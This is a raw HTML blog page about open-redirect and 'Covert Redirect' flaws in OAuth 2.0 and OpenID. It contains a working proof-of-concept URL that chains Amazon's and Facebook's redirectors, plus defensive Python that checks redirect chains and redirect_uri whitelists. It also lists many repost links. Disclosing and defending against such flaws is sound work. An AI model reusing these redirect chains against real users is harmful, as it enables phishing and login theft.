<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<a href="https://www.amazon.it/gp/redirect.html/ref=amb_link_64307649_2?location=http%3A%2F%2Fwww.facebook.com%2Fl.php%3Fu%3Dhttp%253A%252F%252Fwww.craigslist.org%26h%3D_AQHylR65AQG3dZfbwarP74zIO_Gj_ndx4h1QB1r7qbJx4Q&pf_rd_m=AN1VRQENFRJN5&pf_rd_s=left-2&pf_rd_r=15EZARSP2Q0PG0JW0ZB0&pf_rd_t=101&pf_rd_p=122450949&pf_rd_i=2221688051" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://www.amazon.it/gp/<wbr></wbr>redirect.html/ref=amb_link_<wbr></wbr>64307649_2?location=http%3A%<wbr></wbr>2F%2Fwww.facebook.com%2Fl.php%<wbr></wbr>3Fu%3Dhttp%253A%252F%252Fwww.<wbr></wbr>craigslist.org%26h%3D_<wbr></wbr>AQHylR65AQG3dZfbwarP74zIO_Gj_<wbr></wbr>ndx4h1QB1r7qbJx4Q&pf_rd_m=<wbr></wbr>AN1VRQENFRJN5&pf_rd_s=left-2&<wbr></wbr>pf_rd_r=15EZARSP2Q0PG0JW0ZB0&<wbr></wbr>pf_rd_t=101&pf_rd_p=122450949&<wbr></wbr>pf_rd_i=2221688051</span></a></div>
</div>
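The PoC links above all chain two redirectors: Amazon's redirect.html sends the browser to a trusted partner host (facebook.com's l.php), which in turn forwards to whatever its own u parameter names. The following is an added example (not code from the original post, nor from Amazon or Facebook) showing, from the defender's side, why an allowlist that inspects only the host named directly in the redirect parameter passes these URLs, and how walking every nested hop catches them. The allowlist TRUSTED, the parameter names beyond location and u, and the same-site and scheme-relative sample inputs are assumptions for illustration.

```python
"""Walk a redirect chain and check every hop against a host allowlist.

Added example, not code from the original post nor from Amazon or Facebook.
The PoC URLs on this page have the shape

  https://www.amazon.<tld>/gp/redirect.html?location=<facebook l.php URL>

and facebook's l.php carries its own u=<final destination>. A redirector
that checks only the host in `location` passes them, because facebook.com
is a trusted partner host; the real destination sits one level deeper.
"""
from urllib.parse import parse_qs, urlsplit

# Query parameters that commonly carry a destination URL. `location` and `u`
# are the ones the page's PoCs use; the other names are assumed conventions.
URL_PARAMS = ("location", "u", "url", "redirect", "next")

# Hypothetical allowlist of a first-party redirector that trusts a partner
# host (facebook.com). Amazon's real policy is not stated on the page.
TRUSTED = {"www.amazon.co.uk", "www.facebook.com"}


def host_of(url):
    """Lower-cased host of a URL; '' for a relative path."""
    return (urlsplit(url).hostname or "").lower()


def looks_like_url(value):
    """True for absolute http(s) URLs and scheme-relative '//host/...' values."""
    return urlsplit(value).scheme in ("http", "https") or value.startswith("//")


def nested_targets(url, max_depth=5):
    """Return the successive destinations embedded in `url`, outermost first.

    Each hop is decoded exactly once (as the redirector at that hop would),
    so a double-encoded inner URL unwraps one level per hop.
    """
    chain = []
    current = url
    for _ in range(max_depth):
        params = parse_qs(urlsplit(current).query)
        nxt = None
        for name in URL_PARAMS:
            for value in params.get(name, []):
                if looks_like_url(value):
                    nxt = value
                    break
            if nxt:
                break
        if nxt is None:
            break
        chain.append(nxt)
        current = nxt
    return chain


def check_redirect(url, allowed=TRUSTED, every_hop=True):
    """Return ('ok', None, chain) or ('reject', offending_host, chain).

    every_hop=False reproduces the weak check that looks only at the host
    named directly in the redirect parameter.
    """
    chain = nested_targets(url)
    for hop in chain if every_hop else chain[:1]:
        host = host_of(hop)
        if host and host not in allowed:
            return ("reject", host, chain)
    return ("ok", None, chain)


# First PoC URL from the post (amazon.co.uk -> facebook l.php -> bbc.co.uk).
POC_AMAZON_UK = (
    "http://www.amazon.co.uk/gp/redirect.html/ref=cm_sw_cl_fa_dp_Zzbbtb04XETQB"
    "?_encoding=UTF8&location=http%3A%2F%2Fwww.facebook.com%2Fl.php%3Fu%3D"
    "http%253A%252F%252Fwww.bbc.co.uk%26h%3D7AQFwCeYDAQEZsz_cx9BJKCE5Af7KKocYw4jOlGk5TB5kZg"
    "&token=6BD0FB927CC51E76FF446584B1040F70EA7E88E1"
)
# Constructed inputs: a same-site destination and a scheme-relative one.
SAME_SITE = "http://www.amazon.co.uk/gp/redirect.html?location=https%3A%2F%2Fwww.amazon.co.uk%2Fdeals"
SCHEME_RELATIVE = "http://www.amazon.co.uk/gp/redirect.html?location=%2F%2Fexample.invalid%2Flogin"

if __name__ == "__main__":
    for label, u in (("poc", POC_AMAZON_UK), ("same-site", SAME_SITE),
                     ("scheme-relative", SCHEME_RELATIVE)):
        print(label, "host-only:", check_redirect(u, every_hop=False)[:2],
              "every-hop:", check_redirect(u)[:2])
```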
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">POC Video:</span></b></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div>
<div style="line-height: 21.7777786254883px; margin: 0px; outline: none; padding: 0px; text-align: justify;">
<div style="line-height: 21.7777786254883px; margin: 0px; outline: none; padding: 0px;">
<div style="margin: 0px;">
<a href="https://www.youtube.com/watch?v=ss3ALnvU63w&feature=youtu.be"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://www.youtube.com/watch?v=ss3ALnvU63w&feature=youtu.be</span></a></div>
</div>
<div style="line-height: 21.7777786254883px; margin: 0px; outline: none; padding: 0px;">
<div style="margin: 0px;">
<a href="https://www.youtube.com/watch?v=f4W63YXnbIk"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://www.youtube.com/watch?v=f4W63YXnbIk</span></a></div>
</div>
<div style="line-height: 21.7777786254883px; margin: 0px; outline: none; padding: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
</div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b>Blog Details:</b></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://securityrelated.blogspot.com/2015/01/amazon-covert-redirect-security.html">http://securityrelated.blogspot.com/2015/01/amazon-covert-redirect-security.html</a></span></div>
</div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b>Related Articles:</b></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://seclists.org/fulldisclosure/2015/Jan/22">http://seclists.org/fulldisclosure/2015/Jan/22</a></span></div>
<div style="margin: 0px;">
<a href="http://permalink.gmane.org/gmane.comp.security.fulldisclosure/1428"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://permalink.gmane.org/gmane.comp.security.fulldisclosure/1428</span></a></div>
<div style="margin: 0px;">
<a href="http://lists.openwall.net/full-disclosure/2015/01/12/1"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://lists.openwall.net/full-disclosure/2015/01/12/1</span></a></div>
<div style="margin: 0px;">
<a href="http://marc.info/?l=full-disclosure&m=142104333521454&w=4"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://marc.info/?l=full-disclosure&m=142104333521454&w=4</span></a></div>
<div style="margin: 0px;">
<a href="http://diebiyi.com/articles/security/facebook-open-redirect/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://diebiyi.com/articles/security/facebook-open-redirect/</span></a></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="https://www.facebook.com/essaybeans/posts/570476126427191">https://www.facebook.com/essaybeans/posts/570476126427191</a></span></div>
<div style="margin: 0px;">
<a href="http://germancast.blogspot.de/2015/06/facebook-web-security-0day-bug.html" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://germancast.blogspot.de/<wbr></wbr>2015/06/facebook-web-security-<wbr></wbr>0day-bug.html</span></a></div>
<div style="margin: 0px;">
<a href="https://mathfas.wordpress.com/2015/01/11/facebook-open-redirect/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://mathfas.wordpress.com/2015/01/11/facebook-open-redirect/</span></a></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://essaybeans.lofter.com/post/1cc77d20_7300027" target="_blank">http://essaybeans.lofter.com/<wbr></wbr>post/1cc77d20_7300027</a></span></div>
<div>
<div style="margin: 0px;">
<a href="http://qianqiuxue.tumblr.com/post/120750458855/itinfotech-facebook-web-security-0day-bug" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://qianqiuxue.tumblr.com/<wbr></wbr>post/120750458855/itinfotech-<wbr></wbr>facebook-web-security-0day-bug</span></a></div>
</div>
<div style="margin: 0px;">
<a href="https://www.facebook.com/permalink.php?story_fbid=472994806188548&id=405943696226993"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://www.facebook.com/permalink.php?story_fbid=472994806188548&id=405943696226993</span></a></div>
<div style="margin: 0px;">
<a href="http://www.tetraph.com/blog/phishing/facebook-open-redirect/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://www.tetraph.com/blog/phishing/facebook-open-redirect/</span></a></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://itinfotech.tumblr.com/post/120750347586/facebook-web-security-0day-bug" target="_blank">http://itinfotech.tumblr.com/<wbr></wbr>post/120750347586/facebook-<wbr></wbr>web-security-0day-bug</a></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://ittechnology.lofter.com/post/1cfbf60d_72fd108" target="_blank">http://ittechnology.lofter.<wbr></wbr>com/post/1cfbf60d_72fd108</a></span></div>
</div>
<div>
<div style="margin: 0px;">
<a href="http://russiapost.blogspot.ru/2015/06/facebook-web-security-0day-bug.html" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://russiapost.blogspot.ru/<wbr></wbr>2015/06/facebook-web-security-<wbr></wbr>0day-bug.html</span></a></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="https://twitter.com/tetraphibious/status/606676645265567744" target="_blank">https://twitter.com/<wbr></wbr>tetraphibious/status/<wbr></wbr>606676645265567744</a></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="https://plus.google.com/u/0/110001022997295385049/posts/hb6seddG561" target="_blank">https://plus.google.com/u/0/<wbr></wbr>110001022997295385049/posts/<wbr></wbr>hb6seddG561</a></span></div>
</div>
<div>
<div style="margin: 0px;">
<a href="http://whitehatpost.blog.163.com/blog/static/24223205420155501020837/" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://whitehatpost.blog.163.<wbr></wbr>com/blog/static/<wbr></wbr>24223205420155501020837/</span></a></div>
</div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://www.inzeed.com/kaleidoscope/computer-security/facebook-open-redirect/">http://www.inzeed.com/kaleidoscope/computer-security/facebook-open-redirect/</a></span></div>
</div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-6322800700334987667.post-71995270179155357772015-06-04T08:10:00.001-07:002015-06-04T08:10:10.798-07:00OAuth and OpenID Users Threatened by New Security Flaw, Covert Redirect<div class="separator" style="-webkit-text-stroke-width: 0px; clear: both; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: center; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjoV73rKk9LdEhVSrDxgTLIer56dnS5BeLAl0IYGkwG0ifMcNebValwiCBtrNQ2ZIS8uXABEIeYGrxeZlZTqMxSKRGBFTO2y9sNYXG4exuXPJP7rfIvglmenFaesrQgLr-Lsucx_JEOjwan/s1600/dangerous-fingers-hacking-540x334.jpg" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="246" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjoV73rKk9LdEhVSrDxgTLIer56dnS5BeLAl0IYGkwG0ifMcNebValwiCBtrNQ2ZIS8uXABEIeYGrxeZlZTqMxSKRGBFTO2y9sNYXG4exuXPJP7rfIvglmenFaesrQgLr-Lsucx_JEOjwan/s400/dangerous-fingers-hacking-540x334.jpg" style="cursor: move;" width="400" /></a></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
A serious flaw in two widely used security standards could give anyone access to your account information at Google, Microsoft, Facebook, Twitter and many other online services. The flaw, dubbed "Covert Redirect" by its discoverer, exists in two open-source session-authorization protocols, OAuth 2.0 and OpenID.</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
Both standards are employed across the Internet to let users log into websites using their credentials from other sites, such as by logging into a Web forum using a Facebook or Twitter username and password instead of creating a new account just for that forum.</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
Attackers could exploit the flaw to disguise and launch phishing attempts from legitimate websites, said the flaw's finder, mathematics Ph.D. student <a href="http://tetraph.com/wangjing" target="_blank">Wang Jing</a> of the Nanyang Technological University in Singapore.</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
Wang believes it's unlikely that this flaw will be patched any time soon. He says neither the authentication companies (those with which users have an account, such as Google, Microsoft, Facebook, Twitter or LinkedIn, among others) nor the client companies (sites or apps whose users log in via an account from an authentication company) are taking responsibility for fixing the issue.</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
"The vulnerability is usually due to the existing weakness in the third-party websites," Wang <a href="http://tetraph.com/covert_redirect/oauth2_openid_covert_redirect.html" target="_blank">writes on his own blog</a>. "However, they have little incentive to fix the problem."</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
The biggest danger of Covert Redirect is that it could be used to conduct <a href="http://tetraph.com/covert_redirect" target="_blank">phishing</a> attacks, in which cybercriminals harvest login credentials by sending email messages containing links to malicious websites disguised as something their targets might want to visit.</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
Normal phishing attempts can be easy to spot, because the malicious page's URL will usually be off by a couple of letters from that of the real site. The difference with Covert Redirect is that an attacker could use the real website instead by corrupting the site with a malicious login popup dialogue box.</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
For example, say you regularly visit a given forum (the client company), to which you log in using your credentials from Facebook (the authentication company). Facebook uses OAuth 2.0 to authenticate logins, so an attacker could put a corrupted Facebook login popup box on this forum.</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
If you sign in using that popup box, your Facebook data will be released to the attacker, not to the forum. This means the attacker could possibly gain access to your Facebook account, which he or she could use to <a href="http://www.tomsguide.com/us/scariest-security-threats,review-2144-2.html">spread more socially engineered attacks</a> to your Facebook friends.</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
Covert Redirect could also be used in redirection attacks, which is when a link takes you to a different page than the one expected.</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
Wang told <a href="http://www.cnet.com/news/serious-security-flaw-in-oauth-and-openid-discovered/">CNET</a> that authentication companies should maintain whitelists of the client companies that are allowed to use OAuth and OpenID to redirect to them, so that any redirect destination not on the pre-approved list is blocked. But he said he had contacted a number of these authentication companies, and all of them shifted the blame elsewhere.</div>
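The whitelist Wang describes is, in practice, the authorization server's check of the <code>redirect_uri</code> it is asked to send a code or token to. The following is an added example (not code from the article, from Wang, or from any provider) that puts a loose host-only check beside an exact-match whitelist; the client registry, client_id, hostnames and sample requests are constructed for illustration.

```python
"""Redirect-URI validation at an OAuth 2.0 / OpenID authorization server.

Added example, not code from the article or from any provider. The client
registry, client_id, hostnames and sample requests are constructed.
"""
from urllib.parse import urlsplit

# Constructed registry: client_id -> exact redirect URIs registered out of band.
REGISTERED_REDIRECTS = {
    "forum-client": ["https://forum.example/oauth/callback"],
}


def _normalize(uri: str):
    """Split a URI into the parts that must match exactly.

    Returns None when the URI carries a fragment, which has no place in a
    registered redirect target.
    """
    parts = urlsplit(uri)
    if parts.fragment:
        return None
    scheme = parts.scheme.lower()
    host = (parts.hostname or "").lower()
    return scheme, host, parts.port, parts.path or "/", parts.query


def weak_redirect_check(client_id: str, redirect_uri: str) -> bool:
    """The loose policy: any URL on the client's registered host is accepted.

    This is the weak setting. A redirecting endpoint anywhere on that host
    passes, so the code or token ends up wherever that endpoint forwards to.
    """
    requested_host = (urlsplit(redirect_uri).hostname or "").lower()
    for registered in REGISTERED_REDIRECTS.get(client_id, []):
        if requested_host == (urlsplit(registered).hostname or "").lower():
            return True
    return False


def strict_redirect_check(client_id: str, redirect_uri: str) -> bool:
    """Whitelist policy: scheme, host, port, path and query must equal a
    registered URI exactly, and the scheme must be https.

    Anything that merely shares the client's host, including a
    redirect-through-the-client URL, is rejected.
    """
    requested = _normalize(redirect_uri)
    if requested is None or requested[0] != "https":
        return False
    registered = REGISTERED_REDIRECTS.get(client_id, [])
    return any(requested == _normalize(uri) for uri in registered)


def evaluate(client_id: str, redirect_uri: str):
    """Return (weak_verdict, strict_verdict) for one authorization request."""
    return (weak_redirect_check(client_id, redirect_uri),
            strict_redirect_check(client_id, redirect_uri))


# Constructed sample authorization requests for the registered client.
SAMPLE_REQUESTS = [
    "https://forum.example/oauth/callback",                  # registered URI
    "https://forum.example/go?to=https://elsewhere.example",  # via a redirector on the client host
    "http://forum.example/oauth/callback",                   # plaintext downgrade
    "https://forum.example/oauth/callback#x",                # stray fragment
]

if __name__ == "__main__":
    for uri in SAMPLE_REQUESTS:
        weak, strict = evaluate("forum-client", uri)
        print(f"{uri}\n   host-only check: {weak}   exact whitelist: {strict}")
```

Only the first request survives the exact whitelist; the host-only check waves all four through.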
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
Wang told CNET that Facebook had told him it "understood the risks associated with OAuth 2.0" but that fixing the flaw would be "something that can't be accomplished in the short term." Google and LinkedIn allegedly told Wang they were looking into the issue, while Microsoft said the issue did not exist on its own sites.</div>
